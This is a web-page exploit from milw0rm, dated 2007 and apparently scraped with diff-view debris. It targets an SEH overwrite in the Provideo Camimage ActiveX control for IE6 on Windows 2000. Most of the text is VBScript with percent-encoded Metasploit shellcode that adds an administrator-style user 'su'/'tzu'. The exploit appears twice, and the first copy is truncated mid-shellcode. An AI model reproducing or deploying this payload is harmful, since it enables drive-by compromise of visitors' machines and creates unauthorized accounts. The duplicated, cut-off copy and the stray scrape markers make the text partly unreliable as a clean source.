30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
|
||||
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi user32.dll
|
||||
nop = string(96,unescape("%90"))
|
||||
suntzu = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"
|
||||
|
||||
Camimage.URL = suntzu
|
||||
|
||||
</script>
|
||||
</HTML>
|
||||
|
||||
# milw0rm.com [2007-06-02]
|
||||
<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
|
||||
remote seh overwrite exploit / win2k sp4
|
||||
|
||||
tried the SD-222VPRO camera series,you can reach an online demo here:
|
||||
http://www.provideo.com.tw/security%20live%20demo.htm
|
||||
|
||||
rgod
|
||||
-->
|
||||
<HTML>
|
||||
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
REM metasploit one, add a user 'su' with pass 'tzu'
|
||||
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
|
||||
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi user32.dll
|
||||
nop = string(96,unescape("%90"))
|
||||
suntzu = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"
|
||||
|
||||
Camimage.URL = suntzu
|
||||
|
||||
</script>
|
||||
</HTML>
|
||||
|
||||
# milw0rm.com [2007-06-02]
|
||||
|
|
Loading…
Add table
Reference in a new issue